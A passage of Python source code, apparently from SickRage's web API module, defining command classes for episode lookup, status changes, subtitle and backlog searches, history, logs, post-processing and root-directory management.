        return _responds(RESULT_SUCCESS, help_call.run())
class CMD_ComingEpisodes(ApiCall):
    _help = {
        "desc": "Get the coming episodes",
        "optionalParameters": {
            "sort": {"desc": "Change the sort order"},
            "type": {"desc": "One or more categories of coming episodes, separated by |"},
            "paused": {
                "desc": "0 to exclude paused shows, 1 to include them, or omitted to use SickRage default value"
            },
        }
    }

    def __init__(self, args, kwargs):
        # required
        # optional
        self.sort, args = self.check_params(args, kwargs, "sort", "date", False, "string", ComingEpisodes.sorts.keys())
        self.type, args = self.check_params(args, kwargs, "type", '|'.join(ComingEpisodes.categories), False, "list",
                                            ComingEpisodes.categories)
        self.paused, args = self.check_params(args, kwargs, "paused", bool(sickbeard.COMING_EPS_DISPLAY_PAUSED), False,
                                              "bool", [])
        # super, missing, help
        ApiCall.__init__(self, args, kwargs)

    def run(self):
        """ Get the coming episodes """
        grouped_coming_episodes = ComingEpisodes.get_coming_episodes(self.type, self.sort, True, self.paused)
        data = {section: [] for section in grouped_coming_episodes.keys()}

        # flatten each episode into the public API field names
        for section, coming_episodes in grouped_coming_episodes.iteritems():
            for coming_episode in coming_episodes:
                data[section].append({
                    'airdate': coming_episode['airdate'],
                    'airs': coming_episode['airs'],
                    'ep_name': coming_episode['name'],
                    'ep_plot': coming_episode['description'],
                    'episode': coming_episode['episode'],
                    'indexerid': coming_episode['indexer_id'],
                    'network': coming_episode['network'],
                    'paused': coming_episode['paused'],
                    'quality': coming_episode['quality'],
                    'season': coming_episode['season'],
                    'show_name': coming_episode['show_name'],
                    'show_status': coming_episode['status'],
                    'tvdbid': coming_episode['tvdbid'],
                    'weekday': coming_episode['weekday']
                })

        return _responds(RESULT_SUCCESS, data)
class CMD_Episode(ApiCall):
    _help = {
        "desc": "Get detailed information about an episode",
        "requiredParameters": {
            "indexerid": {"desc": "Unique ID of a show"},
            "season": {"desc": "The season number"},
            "episode": {"desc": "The episode number"},
        },
        "optionalParameters": {
            "tvdbid": {"desc": "thetvdb.com unique ID of a show"},
            "full_path": {
                "desc": "Return the full absolute show location (if valid, and True), or the relative show location"
            },
        }
    }

    def __init__(self, args, kwargs):
        # required
        self.indexerid, args = self.check_params(args, kwargs, "indexerid", None, True, "int", [])
        self.s, args = self.check_params(args, kwargs, "season", None, True, "int", [])
        self.e, args = self.check_params(args, kwargs, "episode", None, True, "int", [])
        # optional
        self.fullPath, args = self.check_params(args, kwargs, "full_path", False, False, "bool", [])
        # super, missing, help
        ApiCall.__init__(self, args, kwargs)

    def run(self):
        """ Get detailed information about an episode """
        showObj = sickbeard.helpers.findCertainShow(sickbeard.showList, int(self.indexerid))
        if not showObj:
            return _responds(RESULT_FAILURE, msg="Show not found")

        myDB = db.DBConnection(row_type="dict")
        sqlResults = myDB.select(
            "SELECT name, description, airdate, status, location, file_size, release_name, subtitles FROM tv_episodes WHERE showid = ? AND episode = ? AND season = ?",
            [self.indexerid, self.e, self.s])
        if not len(sqlResults) == 1:
            raise ApiError("Episode not found")
        episode = sqlResults[0]
        # handle path options
        # absolute vs relative vs broken
        showPath = None
        try:
            showPath = showObj.location
        except ShowDirectoryNotFoundException:
            pass

        if bool(self.fullPath) == True and showPath:
            pass
        elif bool(self.fullPath) == False and showPath:
            # using the length because lstrip removes to much
            showPathLength = len(showPath) + 1 # the / or \ yeah not that nice i know
            episode["location"] = episode["location"][showPathLength:]
        elif not showPath: # show dir is broken ... episode path will be empty
            episode["location"] = ""
        # convert stuff to human form
        episode['airdate'] = sbdatetime.sbdatetime.sbfdate(sbdatetime.sbdatetime.convert_to_setting(
            network_timezones.parse_date_time(int(episode['airdate']), showObj.airs, showObj.network)),
            d_preset=dateFormat)
        # split the composite status into a readable status + quality pair
        status, quality = Quality.splitCompositeStatus(int(episode["status"]))
        episode["status"] = _get_status_Strings(status)
        episode["quality"] = get_quality_string(quality)
        episode["file_size_human"] = _sizeof_fmt(episode["file_size"])

        return _responds(RESULT_SUCCESS, episode)
class CMD_EpisodeSearch(ApiCall):
    """ Trigger a manual search for one episode and block until it finishes. """
    _help = {
        "desc": "Search for an episode. The response might take some time.",
        "requiredParameters": {
            "indexerid": {"desc": "Unique ID of a show"},
            "season": {"desc": "The season number"},
            "episode": {"desc": "The episode number"},
        },
        "optionalParameters": {
            "tvdbid": {"desc": "thetvdb.com unique ID of a show"},
        }
    }

    def __init__(self, args, kwargs):
        # required
        self.indexerid, args = self.check_params(args, kwargs, "indexerid", None, True, "int", [])
        self.s, args = self.check_params(args, kwargs, "season", None, True, "int", [])
        self.e, args = self.check_params(args, kwargs, "episode", None, True, "int", [])
        # optional
        # super, missing, help
        ApiCall.__init__(self, args, kwargs)

    def run(self):
        """ Search for an episode """
        showObj = sickbeard.helpers.findCertainShow(sickbeard.showList, int(self.indexerid))
        if not showObj:
            return _responds(RESULT_FAILURE, msg="Show not found")
        # retrieve the episode object and fail if we can't get one
        epObj = showObj.getEpisode(int(self.s), int(self.e))
        if isinstance(epObj, str):
            return _responds(RESULT_FAILURE, msg="Episode not found")
        # make a queue item for it and put it on the queue
        ep_queue_item = search_queue.ManualSearchQueueItem(showObj, epObj)
        sickbeard.searchQueueScheduler.action.add_item(ep_queue_item)  # @UndefinedVariable
        # wait until the queue item tells us whether it worked or not;
        # success stays None while the search is still pending (use `is`,
        # not `==`, for the None sentinel check)
        while ep_queue_item.success is None:  # @UndefinedVariable
            time.sleep(1)
        # return the correct json value
        if ep_queue_item.success:
            status, quality = Quality.splitCompositeStatus(epObj.status)  # @UnusedVariable
            # TODO: split quality and status?
            return _responds(RESULT_SUCCESS, {"quality": get_quality_string(quality)},
                             "Snatched (" + get_quality_string(quality) + ")")
        return _responds(RESULT_FAILURE, msg='Unable to find episode')
class CMD_EpisodeSetStatus(ApiCall):
    _help = {
        "desc": "Set the status of an episode or a season (when no episode is provided)",
        "requiredParameters": {
            "indexerid": {"desc": "Unique ID of a show"},
            "season": {"desc": "The season number"},
            "status": {"desc": "The status of the episode or season"}
        },
        "optionalParameters": {
            "episode": {"desc": "The episode number"},
            "force": {"desc": "True to replace existing downloaded episode or season, False otherwise"},
            "tvdbid": {"desc": "thetvdb.com unique ID of a show"},
        }
    }
    def __init__(self, args, kwargs):
        # required
        self.indexerid, args = self.check_params(args, kwargs, "indexerid", None, True, "int", [])
        self.s, args = self.check_params(args, kwargs, "season", None, True, "int", [])
        self.status, args = self.check_params(args, kwargs, "status", None, True, "string",
                                              ["wanted", "skipped", "ignored", "failed"])
        # optional
        self.e, args = self.check_params(args, kwargs, "episode", None, False, "int", [])
        self.force, args = self.check_params(args, kwargs, "force", False, False, "bool", [])
        # super, missing, help
        ApiCall.__init__(self, args, kwargs)
    def run(self):
        """ Set the status of an episode or a season (when no episode is provided).

        Episodes set to WANTED are collected per season and a backlog search is
        queued for each affected season afterwards.
        """
        showObj = sickbeard.helpers.findCertainShow(sickbeard.showList, int(self.indexerid))
        if not showObj:
            return _responds(RESULT_FAILURE, msg="Show not found")
        # convert the string status to an int (the internal status constant)
        for status in statusStrings.statusStrings:
            if str(statusStrings[status]).lower() == str(self.status).lower():
                self.status = status
                break
        else:  # for/else: we only get here when the loop never hit `break`,
            # i.e. the allowed values contain an item that could not be matched
            # against the internal status strings
            raise ApiError("The status string could not be matched to a status. Report to Devs!")
        ep_list = []
        if self.e:
            epObj = showObj.getEpisode(self.s, self.e)
            if epObj == None:
                return _responds(RESULT_FAILURE, msg="Episode not found")
            ep_list = [epObj]
        else:
            # no episode given: operate on every episode of the season
            ep_list = showObj.getAllEpisodes(season=self.s)
        def _epResult(result_code, ep, msg=""):
            # per-episode result record for the response payload
            return {'season': ep.season, 'episode': ep.episode, 'status': _get_status_Strings(ep.status),
                    'result': result_type_map[result_code], 'message': msg}
        ep_results = []
        failure = False
        start_backlog = False
        segments = {}  # season number -> episodes newly set to WANTED
        sql_l = []
        for epObj in ep_list:
            with epObj.lock:
                if self.status == WANTED:
                    # figure out what episodes are wanted so we can backlog them
                    if epObj.season in segments:
                        segments[epObj.season].append(epObj)
                    else:
                        segments[epObj.season] = [epObj]
                # don't let them mess up UNAIRED episodes
                if epObj.status == UNAIRED:
                    if self.e != None:  # setting the status of an unaired episode is only considered a failure if it was requested directly; it is ignored on a season request
                        ep_results.append(
                            _epResult(RESULT_FAILURE, epObj, "Refusing to change status because it is UNAIRED"))
                        failure = True
                    continue
                if self.status == FAILED and not sickbeard.USE_FAILED_DOWNLOADS:
                    ep_results.append(_epResult(RESULT_FAILURE, epObj, "Refusing to change status to FAILED because failed download handling is disabled"))
                    failure = True
                    continue
                # allow the user to force setting the status for an already downloaded episode
                if epObj.status in Quality.DOWNLOADED + Quality.ARCHIVED and not self.force:
                    ep_results.append(_epResult(RESULT_FAILURE, epObj, "Refusing to change status because it is already marked as DOWNLOADED"))
                    failure = True
                    continue
                epObj.status = self.status
                # batch the DB writes and flush them once after the loop
                sql_l.append(epObj.get_sql())
                if self.status == WANTED:
                    start_backlog = True
                ep_results.append(_epResult(RESULT_SUCCESS, epObj))
        if len(sql_l) > 0:
            myDB = db.DBConnection()
            myDB.mass_action(sql_l)
        extra_msg = ""
        if start_backlog:
            # queue one backlog search per season that gained WANTED episodes
            for season, segment in segments.iteritems():
                cur_backlog_queue_item = search_queue.BacklogQueueItem(showObj, segment)
                sickbeard.searchQueueScheduler.action.add_item(cur_backlog_queue_item)  # @UndefinedVariable
                logger.log(u"API :: Starting backlog for " + showObj.name + " season " + str(
                    season) + " because some episodes were set to WANTED")
                extra_msg = " Backlog started"
        if failure:
            return _responds(RESULT_FAILURE, ep_results, 'Failed to set all or some status. Check data.' + extra_msg)
        else:
            return _responds(RESULT_SUCCESS, msg='All status set successfully.' + extra_msg)
class CMD_SubtitleSearch(ApiCall):
    """ Download subtitles for one episode and report the new languages. """
    _help = {
        "desc": "Search for an episode subtitles. The response might take some time.",
        "requiredParameters": {
            "indexerid": {"desc": "Unique ID of a show"},
            "season": {"desc": "The season number"},
            "episode": {"desc": "The episode number"},
        },
        "optionalParameters": {
            "tvdbid": {"desc": "thetvdb.com unique ID of a show"},
        }
    }

    def __init__(self, args, kwargs):
        # required
        self.indexerid, args = self.check_params(args, kwargs, "indexerid", None, True, "int", [])
        self.s, args = self.check_params(args, kwargs, "season", None, True, "int", [])
        self.e, args = self.check_params(args, kwargs, "episode", None, True, "int", [])
        # optional
        # super, missing, help
        ApiCall.__init__(self, args, kwargs)

    def run(self):
        """ Search for an episode subtitles """
        showObj = sickbeard.helpers.findCertainShow(sickbeard.showList, int(self.indexerid))
        if not showObj:
            return _responds(RESULT_FAILURE, msg="Show not found")
        # retrieve the episode object and fail if we can't get one
        epObj = showObj.getEpisode(int(self.s), int(self.e))
        if isinstance(epObj, str):
            return _responds(RESULT_FAILURE, msg="Episode not found")
        # remember the languages we already had so only newly fetched ones are reported
        previous_subtitles = epObj.subtitles
        try:
            # bugfix: do NOT bind the return value to a local named `subtitles`;
            # that shadowed the `subtitles` module whose fromietf() is used below
            epObj.downloadSubtitles()
        except Exception:
            # narrowed from a bare `except:` so SystemExit/KeyboardInterrupt pass through
            return _responds(RESULT_FAILURE, msg='Unable to find subtitles')
        # return the correct json value
        newSubtitles = frozenset(epObj.subtitles).difference(previous_subtitles)
        if newSubtitles:
            newLangs = [subtitles.fromietf(newSub) for newSub in newSubtitles]
            status = 'New subtitles downloaded: %s' % ', '.join([newLang.name for newLang in newLangs])
            response = _responds(RESULT_SUCCESS, msg='New subtitles found')
        else:
            status = 'No subtitles downloaded'
            response = _responds(RESULT_FAILURE, msg='Unable to find subtitles')
        ui.notifications.message('Subtitles Search', status)
        return response
class CMD_Exceptions(ApiCall):
    """ Return scene-exception (alternative) show names from the cache DB. """
    _help = {
        "desc": "Get the scene exceptions for all or a given show",
        "optionalParameters": {
            "indexerid": {"desc": "Unique ID of a show"},
            "tvdbid": {"desc": "thetvdb.com unique ID of a show"},
        }
    }

    def __init__(self, args, kwargs):
        # required
        # optional
        self.indexerid, args = self.check_params(args, kwargs, "indexerid", None, False, "int", [])
        # super, missing, help
        ApiCall.__init__(self, args, kwargs)

    def run(self):
        """ Get the scene exceptions for all or a given show.

        Without an indexerid the payload is a dict mapping indexerid to a list
        of names; with one it is a flat list of names for that show.
        """
        myDB = db.DBConnection("cache.db", row_type="dict")
        if self.indexerid is None:  # `is None`: 0 would be a (bogus) explicit id
            sqlResults = myDB.select("SELECT show_name, indexer_id AS 'indexerid' FROM scene_exceptions")
            scene_exceptions = {}
            for row in sqlResults:
                indexerid = row["indexerid"]
                if indexerid not in scene_exceptions:
                    scene_exceptions[indexerid] = []
                scene_exceptions[indexerid].append(row["show_name"])
        else:
            showObj = sickbeard.helpers.findCertainShow(sickbeard.showList, int(self.indexerid))
            if not showObj:
                return _responds(RESULT_FAILURE, msg="Show not found")
            sqlResults = myDB.select(
                "SELECT show_name, indexer_id AS 'indexerid' FROM scene_exceptions WHERE indexer_id = ?",
                [self.indexerid])
            scene_exceptions = []
            for row in sqlResults:
                scene_exceptions.append(row["show_name"])
        return _responds(RESULT_SUCCESS, scene_exceptions)
class CMD_History(ApiCall):
    _help = {
        "desc": "Get the downloaded and/or snatched history",
        "optionalParameters": {
            "limit": {"desc": "The maximum number of results to return"},
            "type": {"desc": "Only get some entries. No value will returns every type"},
        }
    }
    def __init__(self, args, kwargs):
        # required
        # optional
        self.limit, args = self.check_params(args, kwargs, "limit", 100, False, "int", [])
        self.type, args = self.check_params(args, kwargs, "type", None, False, "string", ["downloaded", "snatched"])
        # normalise the filter to lower-case; empty string means "no filter"
        self.type = self.type.lower() if isinstance(self.type, str) else ''
        # super, missing, help
        ApiCall.__init__(self, args, kwargs)
    def run(self):
        """ Get the downloaded and/or snatched history.

        Each history row's composite action is split into status + quality and
        the resource path is split into directory and file name.
        """
        data = History().get(self.limit, self.type)
        results = []
        for row in data:
            # the stored action value encodes both status and quality
            status, quality = Quality.splitCompositeStatus(int(row["action"]))
            status = _get_status_Strings(status)
            # apply the optional type filter against the display string
            if self.type and not status.lower() == self.type:
                continue
            row["status"] = status
            row["quality"] = get_quality_string(quality)
            row["date"] = _historyDate_to_dateTimeForm(str(row["date"]))
            del row["action"]
            _rename_element(row, "show_id", "indexerid")
            row["resource_path"] = os.path.dirname(row["resource"])
            row["resource"] = os.path.basename(row["resource"])
            # Add tvdbid for backward compatibility
            row['tvdbid'] = row['indexerid']
            results.append(row)
        return _responds(RESULT_SUCCESS, results)
class CMD_HistoryClear(ApiCall):
    """ Wipe every entry from the download/snatch history. """
    _help = {"desc": "Clear the entire history"}

    def __init__(self, args, kwargs):
        # no required or optional parameters for this command
        ApiCall.__init__(self, args, kwargs)

    def run(self):
        """ Clear the entire history """
        history = History()
        history.clear()
        return _responds(RESULT_SUCCESS, msg="History cleared")
class CMD_HistoryTrim(ApiCall):
    """ Prune download/snatch history rows older than 30 days. """
    _help = {"desc": "Trim history entries older than 30 days"}

    def __init__(self, args, kwargs):
        # no required or optional parameters for this command
        ApiCall.__init__(self, args, kwargs)

    def run(self):
        """ Trim history entries older than 30 days """
        history = History()
        history.trim()
        return _responds(RESULT_SUCCESS, msg='Removed history entries older than 30 days')
class CMD_Failed(ApiCall):
    """ Return rows from the failed-downloads database, capped at 100. """
    _help = {
        "desc": "Get the failed downloads",
        "optionalParameters": {
            "limit": {"desc": "The maximum number of results to return"},
        }
    }

    def __init__(self, args, kwargs):
        # required
        # optional
        self.limit, args = self.check_params(args, kwargs, "limit", 100, False, "int", [])
        # super, missing, help
        ApiCall.__init__(self, args, kwargs)

    def run(self):
        """ Get the failed downloads """
        myDB = db.DBConnection('failed.db', row_type="dict")
        # clamp the requested limit to at most 100 rows; 0 means "no limit"
        effective_limit = min(int(self.limit), 100)
        if effective_limit == 0:
            rows = myDB.select("SELECT * FROM failed")
        else:
            rows = myDB.select("SELECT * FROM failed LIMIT ?", [effective_limit])
        return _responds(RESULT_SUCCESS, rows)
class CMD_Backlog(ApiCall):
    """ List, per unpaused show, the episodes that belong to the backlog. """
    _help = {"desc": "Get the backlogged episodes"}

    def __init__(self, args, kwargs):
        # no required or optional parameters for this command
        ApiCall.__init__(self, args, kwargs)

    def run(self):
        """ Get the backlogged episodes """
        myDB = db.DBConnection(row_type="dict")
        shows = []
        for show in sickbeard.showList:
            rows = myDB.select(
                "SELECT tv_episodes.*, tv_shows.paused FROM tv_episodes INNER JOIN tv_shows ON tv_episodes.showid = tv_shows.indexer_id WHERE showid = ? and paused = 0 ORDER BY season DESC, episode DESC",
                [show.indexerid])
            # keep only episodes whose overview category marks them as backlog material
            backlogged = []
            for row in rows:
                category = show.getOverview(int(row["status"] or -1))
                if not category or category not in (Overview.WANTED, Overview.QUAL):
                    continue
                backlogged.append(row)
            if not backlogged:
                continue
            shows.append({
                "indexerid": show.indexerid,
                "show_name": show.name,
                "status": show.status,
                "episodes": backlogged
            })
        return _responds(RESULT_SUCCESS, shows)
class CMD_Logs(ApiCall):
    """ Return the newest log entries at or above a minimum severity level. """
    _help = {
        "desc": "Get the logs",
        "optionalParameters": {
            "min_level": {
                "desc":
                    "The minimum level classification of log entries to return. "
                    "Each level inherits its above levels: debug < info < warning < error"
            },
        }
    }

    def __init__(self, args, kwargs):
        # required
        # optional
        self.min_level, args = self.check_params(args, kwargs, "min_level", "error", False, "string",
                                                 ["error", "warning", "info", "debug"])
        # super, missing, help
        ApiCall.__init__(self, args, kwargs)

    def run(self):
        """ Get the logs """
        # 10 = Debug / 20 = Info / 30 = Warning / 40 = Error
        minLevel = logger.reverseNames[str(self.min_level).upper()]
        data = []
        if os.path.isfile(logger.logFile):
            with ek(codecs.open, *[logger.logFile, 'r', 'utf-8']) as f:
                data = f.readlines()
        # bugfix: use a raw string -- the original non-raw literal relied on
        # Python passing unknown escapes (\d, \s) through, which raises
        # DeprecationWarning on modern interpreters; also compile once instead
        # of re-parsing the pattern for every line
        line_re = re.compile(r"^(\d\d\d\d)\-(\d\d)\-(\d\d)\s*(\d\d)\:(\d\d):(\d\d)\s*([A-Z]+)\s*(.+?)\s*\:\:\s*(.*)$")
        finalData = []
        numLines = 0
        lastLine = False
        numToShow = min(50, len(data))
        # walk the file backwards so the newest entries come first
        for x in reversed(data):
            match = line_re.match(x)
            if match:
                level = match.group(7)
                if level not in logger.reverseNames:
                    lastLine = False
                    continue
                if logger.reverseNames[level] >= minLevel:
                    lastLine = True
                    finalData.append(x.rstrip("\n"))
                else:
                    lastLine = False
                    continue
            elif lastLine:
                # continuation (e.g. traceback line) of an entry we included
                finalData.append("AA" + x)
            numLines += 1
            if numLines >= numToShow:
                break
        return _responds(RESULT_SUCCESS, finalData)
class CMD_PostProcess(ApiCall):
    _help = {
        "desc": "Manually post-process the files in the download folder",
        "optionalParameters": {
            "path": {"desc": "The path to the folder to post-process"},
            "force_replace": {"desc": "Force already post-processed files to be post-processed again"},
            "return_data": {"desc": "Returns the result of the post-process"},
            "process_method": {"desc": "How should valid post-processed files be handled"},
            "is_priority": {"desc": "Replace the file even if it exists in a higher quality"},
            "failed": {"desc": "Mark download as failed"},
            "type": {"desc": "The type of post-process being requested"},
        }
    }
    def __init__(self, args, kwargs):
        # required
        # optional
        self.path, args = self.check_params(args, kwargs, "path", None, False, "string", [])
        self.force_replace, args = self.check_params(args, kwargs, "force_replace", False, False, "bool", [])
        self.return_data, args = self.check_params(args, kwargs, "return_data", False, False, "bool", [])
        self.process_method, args = self.check_params(args, kwargs, "process_method", False, False, "string",
                                                      ["copy", "symlink", "hardlink", "move"])
        self.is_priority, args = self.check_params(args, kwargs, "is_priority", False, False, "bool", [])
        self.failed, args = self.check_params(args, kwargs, "failed", False, False, "bool", [])
        # NOTE(review): the "required" argument is None here while every sibling
        # call passes a bool -- presumably treated as falsy/optional by
        # check_params; confirm against ApiCall.check_params
        self.type, args = self.check_params(args, kwargs, "type", "auto", None, "string", ["auto", "manual"])
        # super, missing, help
        ApiCall.__init__(self, args, kwargs)
    def run(self):
        """ Manually post-process the files in the download folder """
        # fall back to the configured TV download dir when no path was given
        if not self.path and not sickbeard.TV_DOWNLOAD_DIR:
            return _responds(RESULT_FAILURE, msg="You need to provide a path or set TV Download Dir")
        if not self.path:
            self.path = sickbeard.TV_DOWNLOAD_DIR
        # defensive: type defaults to "auto", so this only fires when the
        # parameter was explicitly passed as an empty value
        if not self.type:
            self.type = 'manual'
        data = processTV.processDir(self.path, process_method=self.process_method, force=self.force_replace,
                                    is_priority=self.is_priority, failed=self.failed, type=self.type)
        # by default only the confirmation message is returned, not the log output
        if not self.return_data:
            data = ""
        return _responds(RESULT_SUCCESS, data=data, msg="Started postprocess for %s" % self.path)
class CMD_SickBeard(ApiCall):
    _help = {"desc": "Get miscellaneous information about SickRage"}
    def __init__(self, args, kwargs):
        # required
        # optional
        # super, missing, help
        ApiCall.__init__(self, args, kwargs)
    def run(self):
        """ Get miscellaneous information about SickRage """
        # report the running branch, the API version and every available command
        data = {"sr_version": sickbeard.BRANCH, "api_version": self.version,
                "api_commands": sorted(function_mapper.keys())}
        return _responds(RESULT_SUCCESS, data)
class CMD_SickBeardAddRootDir(ApiCall):
    _help = {
        "desc": "Add a new root (parent) directory to SickRage",
        "requiredParameters": {
            "location": {"desc": "The full path to the new root (parent) directory"},
        },
        "optionalParameters": {
            "default": {"desc": "Make this new location the default root (parent) directory"},
        }
    }
    def __init__(self, args, kwargs):
        # required
        self.location, args = self.check_params(args, kwargs, "location", None, True, "string", [])
        # optional
        self.default, args = self.check_params(args, kwargs, "default", False, False, "bool", [])
        # super, missing, help
        ApiCall.__init__(self, args, kwargs)
    def run(self):
        """ Add a new root (parent) directory to SickRage.

        sickbeard.ROOT_DIRS is a '|'-joined string whose first element is the
        index of the default root dir within the remaining elements.
        """
        self.location = urllib.unquote_plus(self.location)
        location_matched = 0
        index = 0
        # dissallow adding/setting an invalid dir
        if not ek(os.path.isdir, self.location):
            return _responds(RESULT_FAILURE, msg="Location is invalid")
        root_dirs = []
        if sickbeard.ROOT_DIRS == "":
            # first root dir ever: it automatically becomes the default
            self.default = 1
        else:
            root_dirs = sickbeard.ROOT_DIRS.split('|')
            index = int(sickbeard.ROOT_DIRS.split('|')[0])
            root_dirs.pop(0)
            # clean up the list - replace %xx escapes by their single-character equivalent
            root_dirs = [urllib.unquote_plus(x) for x in root_dirs]
            for x in root_dirs:
                if (x == self.location):
                    # already configured; optionally just promote it to default
                    location_matched = 1
                    if (self.default == 1):
                        index = root_dirs.index(self.location)
                    break
        if (location_matched == 0):
            # new entry: default dirs go to the front, others to the back
            if (self.default == 1):
                root_dirs.insert(0, self.location)
            else:
                root_dirs.append(self.location)
        root_dirs_new = [urllib.unquote_plus(x) for x in root_dirs]
        # re-prepend the default-dir index and serialise back to the '|' format
        root_dirs_new.insert(0, index)
        root_dirs_new = '|'.join(unicode(x) for x in root_dirs_new)
        sickbeard.ROOT_DIRS = root_dirs_new
        return _responds(RESULT_SUCCESS, _getRootDirs(), msg="Root directories updated")
class CMD_SickBeardCheckVersion(ApiCall):
    """ Report the running version and the newest available version. """
    _help = {"desc": "Check if a new version of SickRage is available"}

    def __init__(self, args, kwargs):
        # no required or optional parameters for this command
        ApiCall.__init__(self, args, kwargs)

    def run(self):
        """ Check if a new version of SickRage is available """
        checker = CheckVersion()
        update_available = checker.check_for_new_version()
        updater = checker.updater
        current = {
            "branch": checker.get_branch(),
            "commit": updater.get_cur_commit_hash(),
            "version": updater.get_cur_version(),
        }
        latest = {
            "branch": checker.get_branch(),
            "commit": updater.get_newest_commit_hash(),
            "version": updater.get_newest_version(),
        }
        return _responds(RESULT_SUCCESS, {
            "current_version": current,
            "latest_version": latest,
            "commits_offset": updater.get_num_commits_behind(),
            "needs_update": update_available,
        })
class CMD_SickBeardCheckScheduler(ApiCall):
    _help = {"desc": "Get information about the scheduler"}
    def __init__(self, args, kwargs):
        # required
        # optional
        # super, missing, help
        ApiCall.__init__(self, args, kwargs)
    def run(self):
        """ Get information about the scheduler (backlog state and timings) """
        myDB = db.DBConnection()
        sqlResults = myDB.select("SELECT last_backlog FROM info")
        backlogPaused = sickbeard.searchQueueScheduler.action.is_backlog_paused()  # @UndefinedVariable
        backlogRunning = sickbeard.searchQueueScheduler.action.is_backlog_in_progress()  # @UndefinedVariable
        # format the next run time and decode the Python 2 byte string from the
        # system encoding so it serialises cleanly to JSON
        nextBacklog = sickbeard.backlogSearchScheduler.nextRun().strftime(dateFormat).decode(sickbeard.SYS_ENCODING)
        data = {"backlog_is_paused": int(backlogPaused), "backlog_is_running": int(backlogRunning),
                "last_backlog": _ordinal_to_dateForm(sqlResults[0]["last_backlog"]),
                "next_backlog": nextBacklog}
        return _responds(RESULT_SUCCESS, data)
class CMD_SickBeardDeleteRootDir(ApiCall):
    """ Remove one root (parent) directory from the ROOT_DIRS setting. """
    _help = {
        "desc": "Delete a root (parent) directory from SickRage",
        "requiredParameters": {
            "location": {"desc": "The full path to the root (parent) directory to remove"},
        }
    }

    def __init__(self, args, kwargs):
        # required
        self.location, args = self.check_params(args, kwargs, "location", None, True, "string", [])
        # optional
        # super, missing, help
        ApiCall.__init__(self, args, kwargs)

    def run(self):
        """ Delete a root (parent) directory from SickRage.

        sickbeard.ROOT_DIRS is a '|'-joined string whose first element is the
        index of the default root dir within the remaining elements.
        """
        if sickbeard.ROOT_DIRS == "":
            return _responds(RESULT_FAILURE, _getRootDirs(), msg="No root directories detected")
        newIndex = 0
        root_dirs_new = []
        root_dirs = sickbeard.ROOT_DIRS.split('|')
        index = int(root_dirs[0])
        root_dirs.pop(0)
        # clean up the list - replace %xx escapes by their single-character equivalent
        root_dirs = [urllib.unquote_plus(x) for x in root_dirs]
        old_root_dir = root_dirs[index]
        for curRootDir in root_dirs:
            if not curRootDir == self.location:
                root_dirs_new.append(curRootDir)
            else:
                # a dir was dropped: re-locate the old default so its index can
                # be preserved in the rebuilt setting
                newIndex = 0
                for curIndex, curNewRootDir in enumerate(root_dirs_new):
                    # bugfix: compare string values with ==, not identity (`is`),
                    # which only matched when CPython happened to intern both
                    if curNewRootDir == old_root_dir:
                        newIndex = curIndex
                        break
        root_dirs_new = [urllib.unquote_plus(x) for x in root_dirs_new]
        if len(root_dirs_new) > 0:
            root_dirs_new.insert(0, newIndex)
        root_dirs_new = "|".join(unicode(x) for x in root_dirs_new)
        sickbeard.ROOT_DIRS = root_dirs_new
        # what if the root dir was not found?
        return _responds(RESULT_SUCCESS, _getRootDirs(), msg="Root directory deleted")
class CMD_SickBeardGetDefaults(ApiCall):
    """ Expose the configured defaults used when adding a new show. """
    _help = {"desc": "Get SickRage's user default configuration value"}

    def __init__(self, args, kwargs):
        # no required or optional parameters for this command
        ApiCall.__init__(self, args, kwargs)

    def run(self):
        """ Get SickRage's user default configuration value """
        initial, archive = _mapQuality(sickbeard.QUALITY_DEFAULT)
        defaults = {
            "status": statusStrings[sickbeard.STATUS_DEFAULT].lower(),
            "flatten_folders": int(sickbeard.FLATTEN_FOLDERS_DEFAULT),
            "initial": initial,
            "archive": archive,
            "future_show_paused": int(sickbeard.COMING_EPS_DISPLAY_PAUSED),
        }
        return _responds(RESULT_SUCCESS, defaults)
class CMD_SickBeardGetMessages(ApiCall):
    """ Return the pending UI notifications for the calling client. """
    _help = {"desc": "Get all messages"}

    def __init__(self, args, kwargs):
        # no required or optional parameters for this command
        ApiCall.__init__(self, args, kwargs)

    def run(self):
        """ Get all messages """
        pending = ui.notifications.get_notifications(self.rh.request.remote_ip)
        messages = [{"title": notification.title,
                     "message": notification.message,
                     "type": notification.type}
                    for notification in pending]
        return _responds(RESULT_SUCCESS, messages)
class CMD_SickBeardGetRootDirs(ApiCall):
    """ Expose the configured root (parent) directories. """
    _help = {"desc": "Get all root (parent) directories"}

    def __init__(self, args, kwargs):
        # no required or optional parameters for this command
        ApiCall.__init__(self, args, kwargs)

    def run(self):
        """ Get all root (parent) directories """
        root_dirs = _getRootDirs()
        return _responds(RESULT_SUCCESS, root_dirs)
class CMD_SickBeardPauseBacklog(ApiCall):
    """ Toggle the paused state of the backlog search. """
    _help = {
        "desc": "Pause or unpause the backlog search",
        "optionalParameters": {
            "pause ": {"desc": "True to pause the backlog search, False to unpause it"}
        }
    }

    def __init__(self, args, kwargs):
        # required
        # optional
        self.pause, args = self.check_params(args, kwargs, "pause", False, False, "bool", [])
        # super, missing, help
        ApiCall.__init__(self, args, kwargs)

    def run(self):
        """ Pause or unpause the backlog search """
        scheduler_action = sickbeard.searchQueueScheduler.action
        if self.pause:
            scheduler_action.pause_backlog()  # @UndefinedVariable
            return _responds(RESULT_SUCCESS, msg="Backlog paused")
        scheduler_action.unpause_backlog()  # @UndefinedVariable
        return _responds(RESULT_SUCCESS, msg="Backlog unpaused")
class CMD_SickBeardPing(ApiCall):
    """ Liveness probe; includes the process id once startup has finished. """
    _help = {"desc": "Ping SickRage to check if it is running"}

    def __init__(self, args, kwargs):
        # no required or optional parameters for this command
        ApiCall.__init__(self, args, kwargs)

    def run(self):
        """ Ping SickRage to check if it is running """
        if not sickbeard.started:
            return _responds(RESULT_SUCCESS, msg="Pong")
        return _responds(RESULT_SUCCESS, {"pid": sickbeard.PID}, "Pong")
class CMD_SickBeardRestart(ApiCall):
    """ Ask the running process to restart itself. """
    _help = {"desc": "Restart SickRage"}

    def __init__(self, args, kwargs):
        # no required or optional parameters for this command
        ApiCall.__init__(self, args, kwargs)

    def run(self):
        """ Restart SickRage """
        if Restart.restart(sickbeard.PID):
            return _responds(RESULT_SUCCESS, msg="SickRage is restarting...")
        return _responds(RESULT_FAILURE, msg='SickRage can not be restarted')
class CMD_SickBeardSearchIndexers(ApiCall):
    _help = {
        "desc": "Search for a show with a given name on all the indexers, in a specific language",
        "optionalParameters": {
            "name": {"desc": "The name of the show you want to search for"},
